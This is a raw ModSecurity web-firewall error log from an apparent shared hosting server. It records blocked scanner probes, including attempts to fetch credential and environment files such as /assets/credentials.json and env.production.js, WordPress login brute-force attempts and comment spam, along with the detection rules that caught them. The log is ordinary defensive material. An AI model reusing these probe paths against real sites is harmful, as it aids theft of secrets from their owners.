[Tue May 26 15:05:31.502874 2026] [security2:error] [pid 678998:tid 679183] [client 20.9.81.163:47641] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/css/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrywAAADc"]
[Tue May 26 15:05:31.921573 2026] [security2:error] [pid 678998:tid 679155] [client 136.243.220.209:16300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdr0wAAABs"]
[Tue May 26 15:05:31.940861 2026] [security2:error] [pid 678998:tid 679214] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrygAAAFY"]
[Tue May 26 15:05:32.764170 2026] [security2:error] [pid 678998:tid 679065] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/assets/credentials.json"] [unique_id "ahVpZJ-Rl4i_pgT-iAdr_AAAXkI"]
[Tue May 26 15:05:32.766742 2026] [security2:error] [pid 678998:tid 679190] [client 20.9.81.163:65044] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdr0QAAAD4"]
[Tue May 26 15:05:32.766765 2026] [security2:error] [pid 678998:tid 679190] [client 20.9.81.163:65044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdr0QAAAD4"]
[Tue May 26 15:05:32.946022 2026] [security2:error] [pid 678998:tid 679142] [client 20.9.81.163:65044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/date.php"] [unique_id "ahVpZJ-Rl4i_pgT-iAdsAwAAAA4"]
[Tue May 26 15:05:32.946103 2026] [security2:error] [pid 678998:tid 679142] [client 20.9.81.163:65044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/date.php"] [unique_id "ahVpZJ-Rl4i_pgT-iAdsAwAAAA4"]
[Tue May 26 15:05:33.138879 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:48607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/pomo.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsEQAAAHE"]
[Tue May 26 15:05:33.138978 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:48607] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/pomo.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsEQAAAHE"]
[Tue May 26 15:05:33.249152 2026] [security2:error] [pid 678998:tid 679195] [client 31.57.184.107:53438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.bluespidy.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsDgAAAEM"]
[Tue May 26 15:05:33.299467 2026] [security2:error] [pid 678998:tid 679189] [client 20.9.81.163:27823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/8.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsIwAAAD0"]
[Tue May 26 15:05:33.299544 2026] [security2:error] [pid 678998:tid 679189] [client 20.9.81.163:27823] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/8.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsIwAAAD0"]
[Tue May 26 15:05:33.446018 2026] [security2:error] [pid 678998:tid 679152] [client 20.9.81.163:47673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/t/rfi.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsKAAAABg"]
[Tue May 26 15:05:33.446122 2026] [security2:error] [pid 678998:tid 679152] [client 20.9.81.163:47673] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/t/rfi.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsKAAAABg"]
[Tue May 26 15:05:33.564075 2026] [security2:error] [pid 678998:tid 679150] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsEwAAABY"]
[Tue May 26 15:05:33.689442 2026] [security2:error] [pid 678998:tid 679131] [client 74.249.173.207:4613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/xmlrpc.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsJQAAAAM"]
[Tue May 26 15:05:33.780413 2026] [security2:error] [pid 678998:tid 679197] [client 20.9.81.163:59312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/sendmail.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsPgAAAEU"]
[Tue May 26 15:05:33.780504 2026] [security2:error] [pid 678998:tid 679197] [client 20.9.81.163:59312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/sendmail.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsPgAAAEU"]
[Tue May 26 15:05:33.887602 2026] [security2:error] [pid 678998:tid 679234] [client 152.232.107.149:39184] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsMAAAAGo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:34.362920 2026] [security2:error] [pid 678998:tid 679234] [client 152.232.107.149:39184] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpZZ-Rl4i_pgT-iAdsMAAAAGo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:34.425923 2026] [security2:error] [pid 678998:tid 679084] [remote 132.148.72.88:34598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVpZp-Rl4i_pgT-iAdsUQAAMVU"]
[Tue May 26 15:05:34.501974 2026] [security2:error] [pid 678998:tid 679077] [remote 103.95.119.103:41000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVpZp-Rl4i_pgT-iAdsUwAANU4"]
[Tue May 26 15:05:34.628310 2026] [security2:error] [pid 678998:tid 679083] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/production.json"] [unique_id "ahVpZp-Rl4i_pgT-iAdsYgAAJFQ"]
[Tue May 26 15:05:36.016575 2026] [security2:error] [pid 678998:tid 679205] [client 136.243.220.209:22040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpaJ-Rl4i_pgT-iAdsmgAAAE0"]
[Tue May 26 15:05:36.150529 2026] [security2:error] [pid 678998:tid 679197] [client 31.57.184.107:56731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.vibrantengineering.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVpaJ-Rl4i_pgT-iAdsnAAAAEU"]
[Tue May 26 15:05:36.252608 2026] [security2:error] [pid 678998:tid 679166] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpZ5-Rl4i_pgT-iAdslgAAACY"]
[Tue May 26 15:05:36.483468 2026] [security2:error] [pid 678998:tid 679092] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/env.dev.js"] [unique_id "ahVpaJ-Rl4i_pgT-iAdsqwAAVF0"]
[Tue May 26 15:05:36.974351 2026] [security2:error] [pid 678998:tid 679153] [client 74.249.173.207:4627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/goods.php"] [unique_id "ahVpaJ-Rl4i_pgT-iAdsuAAAABk"]
[Tue May 26 15:05:38.661797 2026] [security2:error] [pid 678998:tid 679211] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpap-Rl4i_pgT-iAds4AAAAFM"]
[Tue May 26 15:05:38.880137 2026] [security2:error] [pid 678998:tid 679191] [client 45.79.207.110:57078] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVpap-Rl4i_pgT-iAds_QAAAD8"]
[Tue May 26 15:05:38.903299 2026] [security2:error] [pid 678998:tid 679145] [client 74.249.173.207:4658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/class-t.api.php"] [unique_id "ahVpap-Rl4i_pgT-iAds_gAAABE"]
[Tue May 26 15:05:38.921234 2026] [security2:error] [pid 678998:tid 679104] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/env.development.js"] [unique_id "ahVpap-Rl4i_pgT-iAds_wAAGmk"]
[Tue May 26 15:05:39.001452 2026] [security2:error] [pid 678998:tid 679129] [client 192.186.165.239:35986] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpap-Rl4i_pgT-iAds9gAAAAE"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:39.381739 2026] [security2:error] [pid 678998:tid 679129] [client 192.186.165.239:35986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpap-Rl4i_pgT-iAds9gAAAAE"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:39.713577 2026] [security2:error] [pid 678998:tid 679221] [client 74.249.173.207:4660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/sf.php"] [unique_id "ahVpa5-Rl4i_pgT-iAdtHQAAAF0"]
[Tue May 26 15:05:40.215542 2026] [security2:error] [pid 678998:tid 679134] [client 136.243.220.209:6549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpbJ-Rl4i_pgT-iAdtLgAAAAY"]
[Tue May 26 15:05:40.469414 2026] [security2:error] [pid 678998:tid 679248] [client 192.186.165.239:50728] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbJ-Rl4i_pgT-iAdtNAAAAHg"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:40.523283 2026] [security2:error] [pid 678998:tid 679130] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpbJ-Rl4i_pgT-iAdtKwAAAAI"]
[Tue May 26 15:05:40.809350 2026] [security2:error] [pid 678998:tid 679107] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/env.js"] [unique_id "ahVpbJ-Rl4i_pgT-iAdtPQAAWmw"]
[Tue May 26 15:05:40.845522 2026] [security2:error] [pid 678998:tid 679248] [client 192.186.165.239:50728] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbJ-Rl4i_pgT-iAdtNAAAAHg"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:41.979074 2026] [security2:error] [pid 678998:tid 679179] [client 192.186.162.26:41172] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbZ-Rl4i_pgT-iAdtXwAAADM"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:41.979182 2026] [security2:error] [pid 678998:tid 679179] [client 192.186.162.26:41172] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbZ-Rl4i_pgT-iAdtXwAAADM"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:42.754583 2026] [security2:error] [pid 678998:tid 679195] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpbp-Rl4i_pgT-iAdtcQAAAEM"]
[Tue May 26 15:05:42.820994 2026] [security2:error] [pid 678998:tid 679130] [client 165.140.119.146:61121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbp-Rl4i_pgT-iAdtfwAAAAI"], referer: https://www.bloggertarget.com
[Tue May 26 15:05:42.821119 2026] [security2:error] [pid 678998:tid 679130] [client 165.140.119.146:61121] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpbp-Rl4i_pgT-iAdtfwAAAAI"], referer: https://www.bloggertarget.com
[Tue May 26 15:05:43.002258 2026] [security2:error] [pid 678998:tid 679001] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/env.prod.js"] [unique_id "ahVpb5-Rl4i_pgT-iAdtgAAARQI"]
[Tue May 26 15:05:43.055528 2026] [security2:error] [pid 678998:tid 679194] [client 192.186.162.26:43968] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpb5-Rl4i_pgT-iAdtgQAAAEI"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:43.055648 2026] [security2:error] [pid 678998:tid 679194] [client 192.186.162.26:43968] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpb5-Rl4i_pgT-iAdtgQAAAEI"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:43.483578 2026] [security2:error] [pid 678998:tid 679185] [client 136.243.220.209:50116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpb5-Rl4i_pgT-iAdtlAAAADk"]
[Tue May 26 15:05:44.333961 2026] [security2:error] [pid 678998:tid 679148] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpb5-Rl4i_pgT-iAdtoAAAABQ"]
[Tue May 26 15:05:44.393535 2026] [security2:error] [pid 678998:tid 679213] [client 62.244.225.226:51290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVpcJ-Rl4i_pgT-iAdtrQAAAFU"]
[Tue May 26 15:05:44.854574 2026] [security2:error] [pid 678998:tid 678999] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/env.production.js"] [unique_id "ahVpcJ-Rl4i_pgT-iAdtvgAAJgA"]
[Tue May 26 15:05:46.584981 2026] [security2:error] [pid 678998:tid 679174] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpcp-Rl4i_pgT-iAdt7QAAAC4"]
[Tue May 26 15:05:47.227950 2026] [security2:error] [pid 678998:tid 679119] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/static/js/main.js"] [unique_id "ahVpc5-Rl4i_pgT-iAduEgAAJ3g"]
[Tue May 26 15:05:47.743897 2026] [security2:error] [pid 678998:tid 679134] [client 192.186.162.18:35869] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpc5-Rl4i_pgT-iAduFgAAAAY"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:48.117308 2026] [security2:error] [pid 678998:tid 679134] [client 192.186.162.18:35869] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpc5-Rl4i_pgT-iAduFgAAAAY"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:05:48.173099 2026] [security2:error] [pid 678998:tid 679229] [client 136.243.220.209:56042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpdJ-Rl4i_pgT-iAduMQAAAGU"]
[Tue May 26 15:05:48.662329 2026] [security2:error] [pid 678998:tid 679190] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpdJ-Rl4i_pgT-iAduNAAAAD4"]
[Tue May 26 15:05:49.075575 2026] [security2:error] [pid 678998:tid 679019] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/static/js/bundle.js"] [unique_id "ahVpdZ-Rl4i_pgT-iAduSgAAHRQ"]
[Tue May 26 15:05:49.278102 2026] [security2:error] [pid 678998:tid 679154] [client 62.60.130.182:49244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-login.php"] [unique_id "ahVpdZ-Rl4i_pgT-iAduSwAAABo"], referer: https://duckduckgo.com/
[Tue May 26 15:05:50.051190 2026] [security2:error] [pid 678998:tid 679213] [client 62.60.130.182:51742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-login.php"] [unique_id "ahVpdp-Rl4i_pgT-iAdubwAAAFU"], referer: https://www.facebook.com/
